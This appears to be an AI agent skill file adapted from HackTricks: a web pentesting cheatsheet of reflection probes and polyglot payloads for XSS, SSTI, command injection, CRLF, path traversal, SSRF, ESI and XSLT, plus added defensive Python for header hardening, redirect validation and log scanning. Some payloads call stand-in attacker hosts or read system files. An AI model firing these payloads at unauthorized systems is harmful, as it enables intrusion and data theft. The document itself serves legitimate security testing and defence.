Hacktricks-skills pentest-reflection-pocs
Web security testing cheatsheet for reflected input vulnerabilities. Use this skill whenever you're doing web penetration testing, security assessments, or bug bounty hunting and need to test for vulnerabilities where user input is reflected in responses. Trigger this when you mention: reflected parameters, input reflection, web vulnerability testing, XSS, SSTI, command injection, path traversal, open redirect, SSRF, CRLF injection, or any web security testing scenario where you need quick PoC payloads.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/pocs-and-polygloths-cheatsheet/pocs-and-polygloths-cheatsheet/SKILL.MD

Web Reflection PoCs & Polyglots Cheatsheet
This skill provides quick reference payloads for testing vulnerabilities when user input is reflected in the response. Use these to rapidly identify exploitable weaknesses during web security assessments.
⚠️ Important: These are basic tests, not comprehensive coverage. Use as a starting point and expand based on findings.
📋 Scope: Focuses on reflection-based vulnerabilities. Does NOT include Content-Type dependent injections (XXE) or database-specific injections.
When to Use These Tests
Use these payloads when you observe:
- User input appearing in HTTP responses
- Reflected parameters in URLs, forms, or headers
- Dynamic content that echoes user data
- Any scenario where attacker-controlled data flows to output
Quick Reference by Vulnerability Type
1. Client-Side Template Injection (CSTI)
Basic Tests:
```
{{7*7}}
[7*7]
```
Polyglot:
```
{{7*7}}[7*7]
```
What to look for: If you see 49 in the response, template injection is likely present.
2. Command Injection
Basic Tests:
```
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
```
Polyglot:
```
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
What to look for: Delays in response (sleep), file listings, or command output.
3. CRLF Injection
Basic Tests:
```
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
What to look for: HTTP response splitting, header injection, or ability to inject custom headers.
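The first CRLF test above, decoded, is what a server-side bug actually sees. As an added example (not from the cheatsheet or HackTricks), the snippet below shows the vulnerable header-building pattern beside its hardened form and a minimal receiver-side parser; the function names and the `/next?from=` redirect parameter are assumptions for this illustration.

```python
from urllib.parse import unquote

# Constructed from the first CRLF test payload above, URL-decoded as a
# server would see it: CR LF followed by a second Location header.
PROBE = unquote("%0d%0aLocation:%20http://attacker.com")


class HeaderInjection(ValueError):
    pass


def build_response_unsafe(redirect_to: str) -> bytes:
    """Vulnerable pattern: a request value is copied into a header line
    verbatim, so an embedded CR LF terminates the line early."""
    headers = ["HTTP/1.1 302 Found", f"Location: /next?from={redirect_to}", "Content-Length: 0"]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1")


def safe_header_value(value: str) -> str:
    """Hardened pattern: refuse CR, LF and NUL before the value reaches
    the wire (the same check Python's http.client applies)."""
    if any(c in value for c in "\r\n\x00"):
        raise HeaderInjection(f"control character in header value: {value!r}")
    return value


def build_response_safe(redirect_to: str) -> bytes:
    headers = ["HTTP/1.1 302 Found", f"Location: /next?from={safe_header_value(redirect_to)}", "Content-Length: 0"]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1")


def parse_headers(raw: bytes) -> dict[str, list[str]]:
    """Minimal receiver-side parser: header name -> list of values, so a
    second Location injected by the probe shows up as a duplicate."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    seen: dict[str, list[str]] = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        seen.setdefault(name.strip(), []).append(value.strip())
    return seen


if __name__ == "__main__":
    print(parse_headers(build_response_unsafe(PROBE))["Location"])  # two Location headers
    try:
        build_response_safe(PROBE)
    except HeaderInjection as exc:
        print("blocked:", exc)
```

Seeing two Location values in the parsed output is the response-splitting symptom the "What to look for" line describes; the hardened builder never emits the second one.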
4. Dangling Markup
Basic Tests:
```
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
```
What to look for: HTML structure changes, unexpected rendering, or layout shifts.
5. File Inclusion / Path Traversal
Basic Tests:
```
/etc/passwd
../../../../../../etc/hosts
..\\..\\..\\..\\..\\..\\..\\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\\..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\\\asdasdasdasd.burpcollab.com/mal.php
```
What to look for: File contents, system files, or out-of-band callbacks to your server.
6. Open Redirect / SSRF
Basic Tests:
```
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```
What to look for: Redirects to attacker-controlled domains or internal network access.
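The `www.whitelisted.com.evil.com` test exists because substring and prefix checks pass it. As an added example (not from the cheatsheet or HackTricks), the weak check below sits beside an allowlist validator that handles the five inputs from this section plus a few constructed variants; `ALLOWED_HOSTS`, the function names and the extra test inputs are assumptions for this illustration.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.whitelisted.com"}  # assumed allowlist for this example


def is_safe_redirect_weak(target: str) -> bool:
    """Common mistake: a substring check on the allowed host name."""
    return "www.whitelisted.com" in target


def is_safe_redirect(target: str) -> bool:
    """Accept only local absolute paths or http(s) URLs whose host is
    exactly on the allowlist; a bare host name is rejected rather than
    having a scheme guessed onto it."""
    # Browsers strip tabs/newlines and treat backslash as a slash, so
    # refuse any target that relies on them instead of normalising.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target) or "\\" in target:
        return False
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative target: exactly one leading slash. "//host" is
        # protocol-relative (urlsplit gives it a netloc) and "///host"
        # still resolves to a host in browsers, so both fail here.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, file: and friends
    # .hostname drops userinfo and port, so "https://www.whitelisted.com@evil.com"
    # yields "evil.com" and fails the exact match below.
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


# The five inputs from this section, then constructed variants and two legitimate targets.
PAGE_TESTS = [
    "www.whitelisted.com",
    "www.whitelisted.com.evil.com",
    "https://google.com",
    "//google.com",
    "javascript:alert(1)",
    "https://www.whitelisted.com.evil.com/login",
    "https://www.whitelisted.com@evil.com/",
    "https://www.whitelisted.com/account",
    "/account/settings",
]

if __name__ == "__main__":
    for t in PAGE_TESTS:
        print(f"{t!r:48} weak={is_safe_redirect_weak(t)!s:5} hardened={is_safe_redirect(t)}")
```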
7. ReDoS (Regular Expression Denial of Service)
Basic Tests:
```
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```
What to look for: Slow responses, timeouts, or server resource exhaustion.
8. Server-Side Inclusion / ESI
Basic Tests:
```
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
Polyglot:
```
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
What to look for: Server-side execution, file inclusion, or ESI processing.
9. Server-Side Template Injection (SSTI)
Basic Tests:
```
${{<%[%'"}}%
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```
Polyglot:
```
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%
```
What to look for: If you see 49 in the response, SSTI is likely present. Different template engines use different syntaxes.
10. XSLT Server-Side Injection
Basic Tests:
```
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
Polyglot:
```
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
What to look for: XSLT version numbers or external stylesheet processing.
11. XSS (Cross-Site Scripting)
Basic Tests:
```
" onclick=alert() a="
'><img src=x onerror=alert(1) />
javascript:alert()
```
Polyglots:
```
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>''><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
What to look for: JavaScript execution, alert boxes, or script tags being rendered.
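The probe families in sections 1 to 11 are also what a defender should expect to see in access logs during an assessment. As an added example (not from the cheatsheet or HackTricks), the snippet below carries broad signatures for those families and runs them over constructed combined-format log lines; the signature set, the family names and the sample lines are assumptions for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Broad signatures for the probe families in this cheatsheet, applied to
# the URL-decoded request target so encoded and plain forms match alike.
PROBE_SIGNATURES = {
    "template-expr": re.compile(r"(?:\{\{|\$\{|<%=|#\{)[^}%]*?\d\s*[*+-]\s*\d"),
    "crlf": re.compile(r"[\r\n]"),
    "path-traversal": re.compile(r"(?:\.\./|\.\.\\){2,}|/etc/(?:passwd|hosts|hostname)|windows[/\\]system32", re.I),
    "command-injection": re.compile(r"\$\{IFS\}|\$\(|`[^`]+`|[;&|]\s*(?:ls|sleep|id|cat)\b", re.I),
    "ssi-esi": re.compile(r"<!--#|<esi:", re.I),
    "xslt": re.compile(r"<xsl:", re.I),
    "xss": re.compile(r"<script|javascript:|\bon[a-z]+\s*=\s*[\w.]*\(", re.I),
}

# Apache/nginx combined-format request line; only ip and target are used below.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log: one benign request, then probes taken from the sections above.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.10 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
203.0.113.10 - - [01/Jan/2024:10:00:03 +0000] "GET /redirect?url=%0d%0aLocation:%20http://attacker.com HTTP/1.1" 302 0
203.0.113.10 - - [01/Jan/2024:10:00:04 +0000] "GET /download?file=../../../../../../etc/hosts HTTP/1.1" 404 0
203.0.113.10 - - [01/Jan/2024:10:00:05 +0000] "GET /ping?host=1;sleep${IFS}9;%23${IFS} HTTP/1.1" 200 12
203.0.113.10 - - [01/Jan/2024:10:00:06 +0000] "GET /page?name=%3Cesi:include%20src=http://attacker.com/%3E HTTP/1.1" 200 900
203.0.113.10 - - [01/Jan/2024:10:00:07 +0000] "GET /comment?text=%22%20onclick=alert()%20a=%22 HTTP/1.1" 200 300
"""


def classify_request(target: str) -> set[str]:
    """Probe families whose signature matches the decoded request target."""
    decoded = unquote_plus(target)
    return {name for name, rx in PROBE_SIGNATURES.items() if rx.search(decoded)}


def scan_log(log_text: str) -> list[tuple[str, str, set[str]]]:
    """(ip, target, families) for each request matching at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and (families := classify_request(m["target"])):
            findings.append((m["ip"], m["target"], families))
    return findings


if __name__ == "__main__":
    for ip, target, families in scan_log(SAMPLE_LOG):
        print(f"{ip} {sorted(families)} {target}")
```

The `template-expr` signature requires an arithmetic probe (7*7 and the like), so the pure syntax-error probe `${{<%[%'"}}%` from section 9 is not caught by it; add a literal rule if that matters for your environment.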
Testing Workflow
- Identify reflection points - Find where user input appears in responses
- Start with basic tests - Use simple payloads first to confirm reflection
- Try polyglots - If basic tests work, polyglots may bypass filters
- Check for OOB - Use Burp Collaborator or a similar listener for out-of-band detection
- Document findings - Note which payloads worked and response characteristics
Safety Notes
- Authorization: Only test systems you have explicit permission to assess
- Rate limiting: Be mindful of request rates to avoid DoS
- Data handling: Some payloads may trigger logging or alerting systems
- Production caution: Sleep commands and resource-intensive tests can impact live systems
Next Steps After Finding Vulnerabilities
Once you identify a vulnerability:
- Confirm it's exploitable with controlled payloads
- Assess impact and scope
- Document with evidence (screenshots, request/response pairs)
- Consider safe exploitation for proof-of-concept
- Prepare remediation recommendations
This cheatsheet is based on the HackTricks pentesting methodology. For comprehensive testing, refer to full vulnerability documentation and use professional security tools.